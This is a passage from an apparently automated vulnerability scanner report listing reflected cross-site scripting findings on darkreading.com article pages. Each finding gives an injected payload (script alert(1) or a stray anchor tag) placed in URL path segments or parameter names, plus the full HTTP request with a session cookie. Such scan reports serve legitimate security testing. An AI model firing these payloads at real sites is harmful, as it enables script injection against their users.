<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Secure US ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222200174%2Findex.htmlbaa92%22%3E%3Ca%3E828205fc86d&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222200174/index.htmlbaa92"><a>828205fc86d"> ...[SNIP]...
3.450. http://www.darkreading.com/security/article/222200174/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/222200174/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb87a"><script>alert(1)</script>44ef265650d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222200174/index.html?eb87a"><script>alert(1)</script>44ef265650d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63a70"><a>e96c29a1f96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article63a70"><a>e96c29a1f96/222300840/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff89"><a>25c92a4f2c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2223008406ff89"><a>25c92a4f2c8/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c832"><a>3b467756a54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222300840/index.html4c832"><a>3b467756a54 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c92e3'><a>214b543bdca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222300840/index.htmlc92e3'><a>214b543bdca HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Spear-Phi ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/222300840/index.htmlc92e3'><a>214b543bdca'> ...[SNIP]...
3.455. http://www.darkreading.com/security/article/222300840/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/222300840/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f26a0"><script>alert(1)</script>1f1cad0c780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222300840/index.html?f26a0"><script>alert(1)</script>1f1cad0c780=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cada4"><a>589b9472ea8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlecada4"><a>589b9472ea8/222301436/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb3e"><a>998f87e844b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2223014368eb3e"><a>998f87e844b/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d843'><a>f82629f135f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301436/index.html9d843'><a>f82629f135f HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73cb1"><a>2df67c5bd79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301436/index.html73cb1"><a>2df67c5bd79 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>'Aurora' ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222301436%2Findex.html73cb1%22%3E%3Ca%3E2df67c5bd79&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222301436/index.html73cb1"><a>2df67c5bd79"> ...[SNIP]...
3.460. http://www.darkreading.com/security/article/222301436/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/222301436/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c19ae"><script>alert(1)</script>e23d9dc99ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222301436/index.html?c19ae"><script>alert(1)</script>e23d9dc99ff=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04f6"><a>acdf0912119 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleb04f6"><a>acdf0912119/222301500/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c577d"><a>94a75e1b53f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/222301500c577d"><a>94a75e1b53f/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f24e"><a>9952baf063f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301500/index.html7f24e"><a>9952baf063f HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 422fa'><a>dbb8496f8ab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301500/index.html422fa'><a>dbb8496f8ab HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>7 Steps F ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/222301500/index.html422fa'><a>dbb8496f8ab'> ...[SNIP]...
3.465. http://www.darkreading.com/security/article/222301500/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/222301500/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e54"><script>alert(1)</script>cb2acc93382 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222301500/index.html?11e54"><script>alert(1)</script>cb2acc93382=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d216"><a>86d0a27d402 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article5d216"><a>86d0a27d402/222600139/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb9f"><a>6d0ba98f5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2226001392fb9f"><a>6d0ba98f5f/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1177e'><a>9fad5a2ee64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222600139/index.html1177e'><a>9fad5a2ee64 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5481"><a>bfd0c8b2b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222600139/index.htmle5481"><a>bfd0c8b2b1e HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Anatomy O ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222600139%2Findex.htmle5481%22%3E%3Ca%3Ebfd0c8b2b1e&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222600139/index.htmle5481"><a>bfd0c8b2b1e"> ...[SNIP]...
3.470. http://www.darkreading.com/security/article/222600139/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/222600139/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955f0"><script>alert(1)</script>8eb4f22c5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222600139/index.html?955f0"><script>alert(1)</script>8eb4f22c5e2=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 521e6"><a>d6c237c7913 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article521e6"><a>d6c237c7913/222900286/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c1c"><a>1737c6c3840 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22290028674c1c"><a>1737c6c3840/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... in?service=http%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F22290028674c1c%22%3E%3Ca%3E1737c6c3840%2F0&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/22290028674c1c"><a>1737c6c3840/0"> ...[SNIP]...
3.473. http://www.darkreading.com/security/article/222900286/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/222900286/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ba"><script>alert(1)</script>c868625e475 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222900286/index.html?804ba"><script>alert(1)</script>c868625e475=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da08d"><a>9c0f9238d45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleda08d"><a>9c0f9238d45/222900775/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 166b2"><a>1616c0893ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/222900775166b2"><a>1616c0893ee/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa3e3'><a>dba39d2ca02 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222900775/index.htmlaa3e3'><a>dba39d2ca02 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c035"><a>a42789bc965 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222900775/index.html4c035"><a>a42789bc965 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>U.S. Fail ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222900775%2Findex.html4c035%22%3E%3Ca%3Ea42789bc965&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222900775/index.html4c035"><a>a42789bc965"> ...[SNIP]...
3.478. http://www.darkreading.com/security/article/222900775/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/222900775/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c557"><script>alert(1)</script>79601a0615d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222900775/index.html?8c557"><script>alert(1)</script>79601a0615d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6411"><a>81184b615aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
